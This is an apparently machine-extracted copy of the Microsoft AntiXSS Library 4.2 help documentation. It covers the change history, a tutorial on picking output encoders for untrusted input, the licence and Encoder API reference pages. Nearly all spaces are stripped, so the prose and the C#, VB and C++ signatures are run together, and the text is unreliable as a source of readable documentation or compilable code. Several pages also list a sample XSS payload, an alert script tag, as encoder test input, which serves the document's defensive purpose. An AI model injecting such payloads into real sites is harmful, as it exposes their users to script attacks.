MicrosoftAntiXSSLibrary

WelcometotheMicrosoftAntiXSSLibrary

Cross-sitescripting(XSS)attacksexploitvulnerabilitiesinweb-basedapplicationsthatfailtoproperlyvalidateand/orencodeinputthatisembeddedinresponsedata.Malicioususerscantheninjectclient-sidescriptintoresponsedatacausingtheunsuspectinguser'sbrowsertoexecutethescriptcode.Thescriptcodewillappeartohaveoriginatedfromatrustedsiteandmaybeabletobypassbrowserprotectionmechanismssuchassecurityzones.

Theseattacksareplatform-and-browserindependent,andcanallowmalicioususerstoperformmaliciousactionssuchasgainingunauthorizedaccesstoclientdatalikecookiesorhijackingsessionsentirely.

SeeAlso:

What'sNew/ChangeHistory

UsingAntiXSSasthedefaultASP.NETencoder(.NET4.0)

LicenseAgreement

Microsoft.Security.Application

AntiXSSHelpandSource

WebProtectionLibraryHomePage

DiscussionForum

SourceCode

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

What'sNewinAntiXSS/ChangeHistory

What'snewinAntiXSS4.2

MinimumRequirements

Youcannow,onceagain,usetheencoderlibrariesin.NET2.0..NET2.0,3.5and4.0havetheirownlibrariesoptimisedforeachversionoftheframework.

.NET4.0Support

The.NET4.0versionofAntiXSScomeswithaclassthatcanbeusedtosetAntiXSSasthedefaultencoderusedbyMVC,WebPagesandWebFormsapplications.

InvalidUnicodeishandleddifferently.

InvalidUnicodecharactersarenowreplacedwiththeUnicodereplacementcharacter,U+FFFD(�).PreviouslywhenencodingstringsthroughHtmlEncode,HtmlAttributeEncode,XmlEncode,XmlAttributeEncodeorCssEncodeinvalidUnicodecharacterswouldbedetectedandanexceptionthrown.

UrlPathEncodeadded.

TheencodinglibrarynowhasEncoder.UrlPathEncode(String)whichwillencodeastringforuseasthepathpartofaURL.

TheHTMLSanitizerhandlesCSSdifferently.

TheHTMLSanitizernowremovesallCSSfromthe<head>sectionofanHTMLpage.Ifa<style>tagisdiscoveredinthebodyofanHTMLpage,orinaninputfragmentthetagwillberemoved,butthecontentskept,ashappenswithotherinvalidtags.Ifthestyleattributeisdiscoveredonanelementitisremoved.

What'snewinAntiXSS4.0

MinimumRequirements

TheAntiXSSLibrarynowrequires.NETFramework3.5.

ReturnValues

Ifyoupassanullasthevaluetobeencodedtheencoderwillnowreturnnull.ThepreviousbehaviorwastoreturnString.Empty.

MediumTrustSupport

TheHTMLSanitizationmethods,GetSafeHtml()andGetSafeHtmlFragment()havebeenmovedtoaseparateassembly.ThisenablestheAntiXssLibraryassemblytoruninmediumtrustenvironments,acommonuserrequest.IfyouwishtousetheHtmlSanitizationlibraryyoumustnowincludetheHtmlSanitizationLibraryassembly.Thisassemblyrequiresfulltrustandtheabilitytorununsafecode.

Adjustablesafe-listingforHTML/XMLEncoding

ThesafelistforHTMLandXMLencodingisnowadjustable.TheMarkAsSafe(LowerCodeCharts,LowerMidCodeCharts,MidCodeCharts,UpperMidCodeCharts,UpperCodeCharts)methodallowstoyouchoosefromtheUnicodeCodeChartswhichlanguagesyourwebapplicationnormallyaccepts.Safe-listingalanguagecodechartleavesthedefinedcharactersintheirnativeformduringencoding,whichincreasesreadabilityintheHTML/XMLdocumentandspeedsupencoding.Certaindangerouscharacterswillalsobeencoded.ThelanguagecodechartsaredefinedintheMicrosoft.Security.Application.LowerCodeCharts,Microsoft.Security.Application.LowerMidCodeCharts,Microsoft.Security.Application.MidCodeCharts,Microsoft.Security.Application.UpperMidCodeChartsandMicrosoft.Security.Application.UpperCodeChartsenumerations.

Itissuggestedyousafelistyouracceptablelanguagesduringyourapplicationinitialization.

InvalidUnicodecharacterdetection

IfanyoftheHTML,XMLorCSSencodingmethodsencountersacharacter

withacharactercodeof0xFFFEor0xFFFF,thecharactersusedtodetectbyteorderatthebeginningoffilesanInvalidUnicodeValueExceptionwillbethrown.

SurrogateCharacterSupportinHTMLandXMLencoding

SupportforsurrogatecharacterpairsforUnicodecharactersoutsidethebasicmultilingualplanehasbeenimproved.Suchcharacterpairsarenowcombinedandencodedastheir&xxxxx;value.Ifahighsurrogatepaircharacterisencounteredwhichisnotfollowedbyalowsurrogatepaircharacter,oralowsurrogatepaircharacterisencounteredwhichisnotprecededbyahighsurrogatepaircharacteranInvalidSurrogatePairExceptionisthrown.

HTML4.01NamedEntitySupport

AnewoverloadoftheHtmlEncodemethod,Encoder.HtmlEncode(String,Boolean)allowsyoutospecifyifthenamedentitiesfromtheHTML4.01specificationshouldbeusedinpreferenceto&#xxxx;encodingwhenanamedentityexists.ForexampleifuseNamedEntitiesissettotruethecopyrightentitywouldbeencodedas&copy;.

HtmlFormUrlEncode

AnewencodingtypesuitableforusinginencodingHtmlPOSTformsubmissionsisnowavailableviaEncoder.HtmlFormUrlEncode.ThisencodesaccordingtotheW3Cspecificationsforapplication/x-www-form-urlencodedMIMEtype.

LDAPEncodingchanges

TheLdapEncodefunctionhasbeendeprecatedinfavoroftwonewfunctions,Encoder.LdapFilterEncode(String)andEncoder.LdapDistinguishedNameEncode(String)

Encoder.LdapFilterEncode(String)encodesinputaccordingtoRFC4515whereunsafevaluesareconvertedto\XXwhereXXistherepresentationoftheunsafecharacter.ForexampleInput OutputParensRUs(forallyourparentheticalneeds)

ParensRUs\28forallyourparentheticalneeds\29

* \2A

C:\MyFile C:\5CMyFileLučić Lu\C4\8Di\C4\87

Encoder.LdapDistinguishedNameEncode(String)encodesinputaccordingtoRFC2253whereunsafecharactersareconvertedto#XXwhereXXistherepresentationoftheunsafecharacterandthecomma,plus,quote,slash,lessthanandgreatthansignsareescapedusingslashnotation(\X).Inadditiontothisaspaceoroctothorpe(#)atthebeginningoftheinputstringis\escapedasisaspaceattheendofastring.Input Output,+\"\<> \,\+\"\\\<\>Hello \HelloHello Hello\#Hello \#HelloLučić Lu#C4#8Di#C4#87

Encoder.LdapDistinguishedNameEncode(String,Boolean,Boolean)isalsoprovidedsoyoumayturnofftheinitialorfinalcharacterescapingrules,forexampleifyouareconcatenatingtheescapeddistinguishednamefragmentintothemidstofacompletedistinguishedname.InadditiontotheRFCmandatedescapingthesafelistexcludesthecharacterslistedathttp://projects.webappsec.org/LDAP-Injection.

MarkOutput

TheabilitytomarkoutputusinganHtmlEncodeoverloadandquerystringparameterhasbeenremoved.

SeeAlso:

UsingAntiXSSasthedefaultASP.NETencoder(.NET4.0)

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

HowdoIuseAntiXSS?

Inthistutorial,I'llshowyouhowtheMicrosoftAnti-CrossSiteScriptingLibrarycanbeusedtoprotectusersfromCross-SiteScripting(XSS)attacks.I'llalsoshowyouaneasymethodforassessingusecasescenariosforpotentialXSSvectorsusingnothingmorethanasimpletable.

NoteCross-sitescripting(XSS)attacksexploitvulnerabilitiesinWeb-basedapplicationsthatfailtoproperlyvalidateand/orencodeinputthatisembeddedinresponsedata.Malicioususerscantheninjectclient-sidescriptintoresponsedatacausingtheunsuspectinguser'sbrowsertoexecutethescriptcode.Thescriptcodewillappeartohaveoriginatedfromatrustedsiteandmaybeabletobypassbrowserprotectionmechanismssuchassecurityzones.InadditioncertainserversidequeriessuchasLDAPlook-upscanbeinjectedinmuchthesamewayasSQLqueriescanbeinjected,changingtheresultofthequery.

Theseattacksareplatformandbrowserindependent,andcanallowmalicioususerstoperformundesiredactionssuchasgainingunauthorizedaccesstoclientdatalikecookiesorhijackingsessionsentirely.

IfyouwantmoreinformationonXSSattacks,includinginstructionsonhowtotestforit,somegoodreferencesare

HowTo:PreventCross-SiteScriptinginASP.NET

Cross-sitescripting(wikipedia)

Cross-siteScripting(XSS)(OWASP)

Protectinganapplication.

ToprotectanapplicationfromXSSattackswefirstneedtounderstandthevectorsthatmalicioususerscanusetoconductsuchattacks.Ideally,weshouldhavedonethisatdesigntimeusingthreatmodelling;however,wecanstilldothisonapplicationsthathavealreadybeenimplementedusingthefollowingsteps:

1. Reviewcodewhichproducesoutput.

2. Determinewhetheroutputincludesuntrustedinputparameters.

3. Determinethecontextinwhichuntrustedinputisusedasoutput.

4. Encodetheoutputappropriately.

Ifyouaren'tsureifinputistrustedornotalwayserronthesideofcautionandassumeitisnot.Examplesofcommonuntrustedinputinclude

Formfields

Querystrings

Cookiecontents

HTTPHeaders

WhichencodershouldIuse?

Onceyouhavefoundcodewhichoutputstotheuseryouneedtodetermineiftheinputistrustedoruntrusted.Onceyouhavedecidedtheinputisuntrustedyoudeterminewhichencodingmethodneedstobeusedtomaketheinputsafe.Thefollowingtablewillbehelpfulindeterminingwhichencodingmethodyoumustuse.EncodingMethod Should

beusedwhen...

Example

HtmlEncode UntrustedinputisusedinHTMLoutputexceptwhenassigningtoanHTMLattribute.

<p>Hello[UntrustedInput]</p>

HtmlAttributeEncode UntrustedinputisusedinHTMLattributes.

<p>id="[UntrustedInput]"</p>

XmlEncode UntrustedinputisusedinXMLoutputexceptwhenassigningtoanXML

<name>[UntrustedInput]</name>

attribute.

XmlAttributeEncode UntrustedinputisusedinXMLattributes.

<name>firstName="[UntrustedInput]"</name>

UrlEncode UntrustedinputisusedasaquerystringvalueinaURL.

<ahref="http://search.bing.com/search?q=[Untrusted-input]">ClickHere!</a>

UrlPathEncode UntrustedinputisusedaspartofapathaURL.

<ahref="http://msdn.microsoft.com/[Untrusted-input]/">ClickHere!</a>

JavaScriptEncode UntrustedinputisusedwithinaJavaScriptcontext.

<script>varsomething="[UntrustedInput]";<script>

OtherencodermethodsincludHtmlFormUrlEncodewhichisusedwhen,incode,youarebuildinganHTTPPOSTrequesttosubmittoawebsiteandLdapDistinguishedNameEncodeandLdapFilterEncodewhichencodeuntrustedinputforsafeusewhenbuildingfiltersorqueriesagainstanLDAPdatabase.

UsingAntiXSS

Nowthatyou'vedeterminedwhichscenariosrequireencoding,allthatislefttodoisaddtheMicrosoftAnti-CrossSiteScriptingLibrarytoyourprojectandencodetheuntrustedinputasitisembeddedinresponsedata.Afteryou'veinstalledthelibraryyouneedtoaddareferenceintoyourproject.Todothisusethefollowingsteps:

1. RightclicktheprojectintheSolutionExplorerWindowinVisualStudio.

2. SelecttheAddReference...optionfromthecontextmenu.

3. Selectthebrowsetabandselecttheinstallationdirectory,thenaddtheAntiXSSLibrary.dllappropriateforthe.NETframeworkversionyouareusing.

IfyouhavenotchangedtheinstalldirectorythelibrarywillbeinC:\ProgramFiles\MicrosoftInformationSecurity\AntiXSSLibraryv4.2(32bitOSes)orC:\ProgramFiles(x86)\MicrosoftInformationSecurity\AntiXSSLibraryv4.2(64bitOSes).Thisfolderwillcontain3directories,oneforeachversionofthe.NETframeworkAntiXSSsupports.

Onceyou'veaddedthereferencetothelibraryyouwillneedtoadjustyourcodetousetheappropriateencoder.Todothisopenthefileswhichcontaincodethatwritesoutputthen

1. Addausingdirective;usingMicrosoft.Security.Application;

2. Changethecodewhichassignsoutput,forexamplestringName=Request.QueryString["Name"];

wouldbecomestringName=

Encoder.HtmlEncode(Request.QueryString["Name"]);

NowrebuildyourwebapplicationandforXSS.

SeeAlso:

UsingAntiXSSasthedefaultASP.NETencoder(.NET4.0)

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

UsingAntiXSSasthedefaultASP.NETencoder

.NET4.0introducedtheabilitytoswapthedefaultencodinglibrariesfromthecore.NETframeworklibrariestoanyexternallibrarywhichimplementsSystem.Web.Util.HttpEncoder.AntiXSS4.1nowprovidesanimplementationofthisclasswhichwillallowyoutouseAntiXSSasthedefaultencoderinbothMVCandWebForms.

ToconfigureAntiXSSasthedefaultencoderyouwillneedtoensureyouhaveaddedthe.NET4.0versionofthelibrarytoyourapplication.YoumustalsoaddanencoderTypeattributetothehttpRuntimesectioninyourweb.config;<httpRuntime

encoderType="Microsoft.Security.Application.AntiXssEncoder,

AntiXssLibrary"/>

SeeAlso:

What'sNewinAntiXSS

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

LicenseAgreement

MicrosoftPublicLicense(Ms-PL)

MicrosoftWebProtectionLibrary(http://wpl.codeplex.com)ThisworkislicensedundertheMicrosoftPublicLicense(Ms-PL)Copyright(c)2010MicrosoftCorporation

Thislicensegovernsuseoftheaccompanyingsoftware.Ifyouusethesoftware,youacceptthislicense.Ifyoudonotacceptthelicense,donotusethesoftware.

1. Definitions-Theterms"reproduce,""reproduction,""derivativeworks,"and"distribution"havethesamemeaninghereasunderU.S.copyrightlaw.A"contribution"istheoriginalsoftware,oranyadditionsorchangestothesoftware.A"contributor"isanypersonthatdistributesitscontributionunderthislicense."Licensedpatents"areacontributor'spatentclaimsthatreaddirectlyonitscontribution.

2. GrantofRights

1. CopyrightGrantSubjecttothetermsofthislicense,includingthelicenseconditionsandlimitationsinsection3,eachcontributorgrantsyouanon-exclusive,worldwide,royalty-freecopyrightlicensetoreproduceitscontribution,preparederivativeworksofitscontribution,anddistributeitscontributionoranyderivativeworksthatyoucreate.

2. PatentGrantSubjecttothetermsofthislicense,includingthelicenseconditionsandlimitationsinsection3,eachcontributorgrantsyouanon-exclusive,worldwide,royalty-freelicenseunderitslicensedpatentstomake,havemade,use,sell,offerforsale,import,and/orotherwisedisposeofitscontributioninthesoftwareorderivativeworksofthecontributioninthesoftware.

3. ConditionsandLimitations

1. NoTrademarkLicenseThislicensedoesnotgrantyourightstouse

anycontributors'name,logo,ortrademarks.

2. Ifyoubringapatentclaimagainstanycontributoroverpatentsthatyouclaimareinfringedbythesoftware,yourpatentlicensefromsuchcontributortothesoftwareendsautomatically.

3. Ifyoudistributeanyportionofthesoftware,youmustretainallcopyright,patent,trademark,andattributionnoticesthatarepresentinthesoftware.

4. Ifyoudistributeanyportionofthesoftwareinsourcecodeform,youmaydosoonlyunderthislicensebyincludingacompletecopyofthislicensewithyourdistribution.Ifyoudistributeanyportionofthesoftwareincompiledorobjectcodeform,youmayonlydosounderalicensethatcomplieswiththislicense.

5. Thesoftwareislicensed"as-is."Youbeartheriskofusingit.Thecontributorsgivenoexpresswarranties,guarantees,orconditions.Youmayhaveadditionalconsumerrightsunderyourlocallawswhichthislicensecannotchange.Totheextentpermittedunderyourlocallaws,thecontributorsexcludetheimpliedwarrantiesofmerchantability,fitnessforaparticularpurposeandnon-infringement.

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Microsoft.Security.ApplicationNamespace

TheMicrosoftAnti-CrossSiteScriptingLibraryisanencodinglibrarydesignedtohelpdevelopersprotecttheirASP.NETweb-basedapplicationsfromXSSattacks.Itdiffersfrommostencodinglibrariesinthatitusesthewhite-listingtechnique--sometimesreferredtoastheprincipleofinclusions--toprovideprotectionagainstXSSattacks.Thisapproachworksbyfirstdefiningavalidorallowablesetofcharacters,andencodesanythingoutsidethisset(invalidcharactersorpotentialattacks).Thewhite-listingapproachprovidesseveraladvantagesoverotherencodingschemes.

Classes

Class DescriptionEncoder Performsencodingofinputstringsto

provideprotectionagainstCross-SiteScripting(XSS)attacksandLDAPinjectionattacksinvariouscontexts.

Sanitizer SanitizesinputHTMLtomakeitsafetobedisplayedonabrowserbyremovingpotentiallydangeroustags.

UnicodeCharacterEncoder ProvidesHTMLencodingmethods.

Enumerations

Enumeration DescriptionLowerCodeCharts ValuesforthelowestsectionoftheUTF8

Unicodecodetables,fromU0000toU0FFF.

LowerMidCodeCharts Valuesforthelower-midsectionoftheUTF8Unicodecodetables,fromU1000toU1EFF.

MidCodeCharts ValuesforthemiddlesectionoftheUTF8Unicodecodetables,fromU1F00toU2DDF

UpperCodeCharts ValuesfortheuppersectionoftheUTF8Unicodecodetables,fromUA8E0toUFFFD

UpperMidCodeCharts ValuesfortheuppermiddlesectionoftheUTF8Unicodecodetables,fromU2DE0toUA8DF

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

EncoderClassMembersSeeAlso

PerformsencodingofinputstringstoprovideprotectionagainstCross-SiteScripting(XSS)attacksandLDAPinjectionattacksinvariouscontexts.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticclassEncoder

VisualBasic

PublicNotInheritableClassEncoder

VisualC++

publicrefclassEncoderabstractsealed

RemarksThisencodinglibraryusesthePrincipleofInclusions,sometimesreferredtoas"safe-listing"toprovideprotectionagainstinjectionattacks.Withsafe-listingprotection,algorithmslookforvalidinputsandautomaticallytreateverythingoutsidethatsetasapotentialattack.Thislibrarycanbeusedasadefenseindepthapproachwithothermitigationtechniques.Itissuitableforapplicationswithhighsecurityrequirements.

InheritanceHierarchySystem.ObjectMicrosoft.Security.Application.Encoder

SeeAlso

EncoderMembersMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

EncoderMembersEncoderClassMethodsSeeAlso

TheEncodertypeexposesthefollowingmembers.

Methods

Name DescriptionCssEncode Encodesthespecified

stringforuseinCascadingStyleSheet(CSS)attributes.Thereturnvaluefromthisfunctionisexpectedtobeusedinbuildinganattributestring.CSSstringattributesshouldbequotedvalues.

HtmlAttributeEncode EncodesaninputstringforuseinanHTMLattribute.

HtmlEncode(String) EncodesinputstringsforuseinHTML.

HtmlEncode(String,Boolean) EncodesinputstringsforuseinHTML.

HtmlFormUrlEncode(String) Encodesinputstringsforuseinapplication/x-www-form-urlencodedformsubmissions.

HtmlFormUrlEncode(String,Int32) Encodesinputstringsforuseinapplication/x-www-form-urlencodedformsubmissions.

HtmlFormUrlEncode(String,Encoding) Encodesinputstringsforuseinapplication/x-www-form-urlencodedformsubmissions.

JavaScriptEncode(String) EncodesinputstringsforuseinJavaScript.

JavaScriptEncode(String,Boolean) EncodesinputstringsforuseinJavaScript.

LdapDistinguishedNameEncode(String) EncodesinputstringsforuseasavalueinLightweightDirectoryAccessProtocol(LDAP)DNs.

LdapDistinguishedNameEncode(String,Boolean,Boolean)

EncodesinputstringsforuseasavalueinLightweightDirectoryAccessProtocol(LDAP)DNs.

LdapEncode Obsolete.EncodesinputstringstobeusedasavalueinLightweightDirectoryAccessProtocol(LDAP)searchqueries.

LdapFilterEncode EncodesinputstringsforuseasavalueinLightweightDirectoryAccessProtocol(LDAP)filterqueries.

UrlEncode(String) Encodesinputstringsforuseinuniversalresourcelocators(URLs).

UrlEncode(String,Int32) Encodesinputstringsforuseinuniversalresourcelocators(URLs).

UrlEncode(String,Encoding) Encodesinputstringsforuseinuniversalresourcelocators(URLs).

UrlPathEncode URL-encodesthepathsectionofaURLstringandreturnstheencodedstring.

VisualBasicScriptEncode EncodesinputstringsforuseinVisualBasicScript.

XmlAttributeEncode Encodesinputstringsfor

useinXMLattributes.XmlEncode Encodesinputstringsfor

useinXML.

SeeAlso

EncoderClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

EncoderMethodsEncoderClassSeeAlso

TheEncodertypeexposesthefollowingmembers.

Methods

Name DescriptionCssEncode Encodesthespecified

stringforuseinCascadingStyleSheet(CSS)attributes.Thereturnvaluefromthisfunctionisexpectedtobeusedinbuildinganattributestring.CSSstringattributesshouldbequotedvalues.

HtmlAttributeEncode EncodesaninputstringforuseinanHTMLattribute.

HtmlEncode(String) EncodesinputstringsforuseinHTML.

HtmlEncode(String,Boolean) EncodesinputstringsforuseinHTML.

HtmlFormUrlEncode(String) Encodesinputstringsforuseinapplication/x-www-form-urlencodedformsubmissions.

HtmlFormUrlEncode(String,Int32) Encodesinputstringsforuseinapplication/x-www-form-urlencodedformsubmissions.

HtmlFormUrlEncode(String,Encoding) Encodesinputstringsforuseinapplication/x-www-form-urlencodedformsubmissions.

JavaScriptEncode(String) EncodesinputstringsforuseinJavaScript.

JavaScriptEncode(String,Boolean) EncodesinputstringsforuseinJavaScript.

LdapDistinguishedNameEncode(String) EncodesinputstringsforuseasavalueinLightweightDirectoryAccessProtocol(LDAP)DNs.

LdapDistinguishedNameEncode(String,Boolean,Boolean)

EncodesinputstringsforuseasavalueinLightweightDirectoryAccessProtocol(LDAP)DNs.

LdapEncode Obsolete.EncodesinputstringstobeusedasavalueinLightweightDirectoryAccessProtocol(LDAP)searchqueries.

LdapFilterEncode EncodesinputstringsforuseasavalueinLightweightDirectoryAccessProtocol(LDAP)filterqueries.

UrlEncode(String) Encodesinputstringsforuseinuniversalresourcelocators(URLs).

UrlEncode(String,Int32) Encodesinputstringsforuseinuniversalresourcelocators(URLs).

UrlEncode(String,Encoding) Encodesinputstringsforuseinuniversalresourcelocators(URLs).

UrlPathEncode URL-encodesthepathsectionofaURLstringandreturnstheencodedstring.

VisualBasicScriptEncode EncodesinputstringsforuseinVisualBasicScript.

XmlAttributeEncode Encodesinputstringsfor

useinXMLattributes.XmlEncode Encodesinputstringsfor

useinXML.

SeeAlso

EncoderClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.CssEncodeMethodEncoderClassSeeAlso

EncodesthespecifiedstringforuseinCascadingStyleSheet(CSS)attributes.Thereturnvaluefromthisfunctionisexpectedtobeusedinbuildinganattributestring.CSSstringattributesshouldbequotedvalues.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringCssEncode(

stringinput

)

VisualBasic

PublicSharedFunctionCssEncode(_

inputAsString_

)AsString

VisualC++

public:

staticString^CssEncode(

String^input

)

ParametersinputType:System.StringStringtobeencoded.

ReturnValueEncodedstringforuseinCSSelementvalues.

RemarksThismethodencodesallcharactersexceptthosethatareinthesafelist.Thefollowingtableliststhedefaultsafecharacters.UnicodeCodeChart Characters(s) DescriptionC0ControlsandBasicLatin A-Z UppercasealphabeticlettersC0ControlsandBasicLatin a-z LowercasealphabeticlettersC0ControlsandBasicLatin 0-9 Numbers

TheCSScharacterescapesequenceconsistsofabackslashcharacter(\)followedbyuptosixhexadecimaldigitsthatrepresentacharactercodefromtheISO10646standard.(TheISO10646standardiseffectivelyequivalenttoUnicode.)Anycharacterotherthanahexadecimaldigitterminatestheescapesequence.Ifacharacterthatfollowstheescapesequenceisalsoavalidhexadecimaldigit,itmusteitherincludesixdigitsintheescapesequenceoruseawhitespacecharactertoterminatetheescapesequence.Forexample,\000020denotesaspace.

SeeAlso

EncoderClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.HtmlAttributeEncodeMethodEncoderClassSeeAlso

EncodesaninputstringforuseinanHTMLattribute.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringHtmlAttributeEncode(

stringinput

)

VisualBasic

PublicSharedFunctionHtmlAttributeEncode(_

inputAsString_

)AsString

VisualC++

public:

staticString^HtmlAttributeEncode(

String^input

)

ParametersinputType:System.StringStringtobeencoded.

ReturnValueTheinputstringencodedforuseinanHTMLattribute.

RemarksThisfunctionencodesallbutknownsafecharacters.Charactersareencodedusing&#DECIMAL;notation.Safecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers, Comma. Period- Dash_ Underscore

ThesafelistmaybeadjustedusingMarkAsSafe(LowerCodeCharts,LowerMidCodeCharts,MidCodeCharts,UpperMidCodeCharts,UpperCodeCharts).Exampleinputsandencodedoutputs:alert('XSSAttack!'); alert(&#39;XSS&#32;Attack!&#39;);user@contoso.com user@contoso.comAnti-CrossSiteScriptingLibrary

Anti-Cross&#32;Site&#32;Scripting&#32;Library

SeeAlso

EncoderClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.HtmlEncodeMethodEncoderClassSeeAlso

OverloadList

Name DescriptionHtmlEncode(String) EncodesinputstringsforuseinHTML.HtmlEncode(String,Boolean)

EncodesinputstringsforuseinHTML.

SeeAlso

EncoderClassEncoderMembersMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.HtmlEncodeMethod(String)EncoderClassSeeAlso

EncodesinputstringsforuseinHTML.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringHtmlEncode(

stringinput

)

VisualBasic

PublicSharedFunctionHtmlEncode(_

inputAsString_

)AsString

VisualC++

public:

staticString^HtmlEncode(

String^input

)

ParametersinputType:System.StringStringtobeencoded.

ReturnValueEncodedstringforuseinHTML.

RemarksAllcharactersnotsafelistedareencodedtotheirUnicodedecimalvalue,using&#DECIMAL;notation.Thedefaultsafecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers, Comma. Period- Dash_ Underscore' Apostrophe

Space

ThesafelistmaybeadjustedusingMarkAsSafe(LowerCodeCharts,LowerMidCodeCharts,MidCodeCharts,UpperMidCodeCharts,UpperCodeCharts).Exampleinputsandtheirrelatedencodedoutputs:<script>alert('XSSAttack!');</script>

&lt;script&gt;alert('XSSAttack!');&lt;/script&gt;

user@contoso.com user@contoso.comAnti-CrossSiteScriptingLibrary

Anti-CrossSiteScriptingLibrary

"Anti-CrossSiteScriptingLibrary"

&quote;Anti-CrossSiteScriptingLibrary&quote;

SeeAlso

EncoderClassHtmlEncodeOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.HtmlEncodeMethod(String,Boolean)EncoderClassSeeAlso

EncodesinputstringsforuseinHTML.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringHtmlEncode(

stringinput,

booluseNamedEntities

)

VisualBasic

PublicSharedFunctionHtmlEncode(_

inputAsString,_

useNamedEntitiesAsBoolean_

)AsString

VisualC++

public:

staticString^HtmlEncode(

String^input,

booluseNamedEntities

)

ParametersinputType:System.StringStringtobeencoded.useNamedEntitiesType:System.BooleanValueindicatingiftheHTML4.0namedentitiesshouldbeused.

ReturnValue

EncodedstringforuseinHTML.

RemarksAllcharactersnotsafelistedareencodedtotheirUnicodedecimalvalue,using&#DECIMAL;notation.IfyouchoosetousenamedentitiesthenifacharacterisanHTML4.0namedentitythenamedentitywillbeused.Thedefaultsafecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers, Comma. Period- Dash_ Underscore' Apostrophe

Space

ThesafelistmaybeadjustedusingMarkAsSafe(LowerCodeCharts,LowerMidCodeCharts,MidCodeCharts,UpperMidCodeCharts,UpperCodeCharts).Exampleinputsandtheirrelatedencodedoutputs:<script>alert('XSSAttack!');</script>

&lt;script&gt;alert('XSSAttack!');&lt;/script&gt;

user@contoso.com user@contoso.comAnti-CrossSiteScriptingLibrary

Anti-CrossSiteScriptingLibrary

"Anti-CrossSiteScriptingLibrary"

&quote;Anti-CrossSiteScriptingLibrary&quote;

SeeAlso

EncoderClassHtmlEncodeOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.HtmlFormUrlEncodeMethodEncoderClassSeeAlso

OverloadList

Name DescriptionHtmlFormUrlEncode(String) Encodesinputstringsforusein

application/x-www-form-urlencodedformsubmissions.

HtmlFormUrlEncode(String,Int32)

Encodesinputstringsforuseinapplication/x-www-form-urlencodedformsubmissions.

HtmlFormUrlEncode(String,Encoding)

Encodesinputstringsforuseinapplication/x-www-form-urlencodedformsubmissions.

SeeAlso

EncoderClassEncoderMembersMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.HtmlFormUrlEncodeMethod(String)EncoderClassSeeAlso

Encodesinputstringsforuseinapplication/x-www-form-urlencodedformsubmissions.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringHtmlFormUrlEncode(

stringinput

)

VisualBasic

PublicSharedFunctionHtmlFormUrlEncode(_

inputAsString_

)AsString

VisualC++

public:

staticString^HtmlFormUrlEncode(

String^input

)

ParametersinputType:System.StringStringtobeencoded.

ReturnValueEncodedstringforuseinURLs.

RemarksThisfunctionencodesallbutknownsafecharacters.Charactersareencodedusing%SINGLE_BYTE_HEXand%DOUBLE_BYTE_HEXnotation.Safecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers. Period- Dash_ Underscore~ Tilde

Exampleinputsandencodedoutputs:alert('XSSAttack!'); alert%28%27XSS+Attack%21%27%29%3buser@contoso.com user%40contoso.comAnti-CrossSiteScriptingLibrary

Anti-Cross+Site+Scripting+Library

SeeAlso

EncoderClassHtmlFormUrlEncodeOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.HtmlFormUrlEncodeMethod(String,Int32)EncoderClassSeeAlso

Encodesinputstringsforuseinapplication/x-www-form-urlencodedformsubmissions.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringHtmlFormUrlEncode(

stringinput,

intcodePage

)

VisualBasic

PublicSharedFunctionHtmlFormUrlEncode(_

